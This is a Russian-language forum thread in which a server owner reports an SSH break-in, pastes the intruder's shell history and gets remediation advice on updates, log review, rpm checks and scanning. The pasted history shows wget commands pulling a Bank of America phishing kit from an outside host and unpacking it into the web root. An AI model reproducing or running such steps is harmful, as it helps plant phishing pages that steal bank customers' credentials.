Только что зашёл на свою машину через ssh и обнаружил, что последний сеанс был неизвестно откуда :-(
Вот последние выполненные команды (из history):

982 cd /usr/include/
983 cat libssh.h
984 more libssh.h
985 cd /var/www
986 ls -all
987 cd html
988 ls
989 cat index.html
990 ftp
991 wget www.caldsl.com/~b1yamamoto/www.bankofamerica.com.tar.gz
992 wget www.caldsl.com/~b1yamamoto/www.bankofamerica.com.tar.gz
993 ftp
994 ls
995 tar zxvf www.bankofamerica.com.tar.gz
996 rm -rf
997 ls
998 cd www.bankofamerica.com/sslencrypt218bit/online_banking/
999 pico done.php
1000 nano done.php

Первый вопрос: как? У меня нормальный пароль (10 случайных символов), сервисов никаких опасных вроде бы не запущено (но запущен iptables).
Правда я вчера запустил proftpd... Система конечно немного старовата -- FC5...
Второй вопрос: что делать?
С помощью этих команд, как я понял, мне залили фишинг страничку (её я уже удалил). Вопрос в том, что делать дальше?
Пароль сменил, proftpd остановил. Что ещё надо сделать?

Gangabass,

Обновления безопасности стоят?

Интересно, к машине еще кто-нибудь имеет доступ кроме тебя?

ИМХО, обновиться до последнего стабильного релиза всех пакетов, особенно все, что касается безопасности, поковырять машину спецсредствами (http://www.linux.com/feature/48225)

Проверить средствами rpm нет-ли левых файлов, посмотреть логи с целью нахождения логов взлома. Чаще всего взламывают через дырявые движки. Возможно так-же прослушивание ftp трафика (если нет тунелирования, пароли передаются в открытом виде).

Проверить средствами rpm нет-ли левых файлов, посмотреть логи с целью нахождения логов взлома. Чаще всего взламывают через дырявые движки. Возможно так-же прослушивание ftp трафика (если нет тунелирования, пароли передаются в открытом виде).
На FTP я заходил только из локальной сети, так что прослушать было очень сложно.
На счёт дырявых движков надо будет посмотреть Nessus'ом.

Интересно, к машине еще кто-нибудь имеет доступ кроме тебя? »
Получается, что имеет ;-) Ну или имел.
На самом деле доступ был только у меня. Подключался я с трёх разных мест:
1. с работы, т. е. из внутренней сети. машина с Windows полностью пропатчена, установлен Kaspersky Internet Security со свежими базами. Т. е. версия трояна тут маловероятна.
2. из дома. машина с Windows подключена к домашней сети, патчи и антивирусные базу уже не такие свежие (всё руки никак не дойдут) -- примерно полуторомесячной давности.
3. из дома. машина с Windows, патчи для ОС двухмесячной давности, а для антивируса базы месячной давности.
Я конечно проверю все компьютеры на предмет программ-шпионов, но вряд ли что-то найду. Судя по всему взломали именно Linux-машинку.
Буду обновляться до FC7.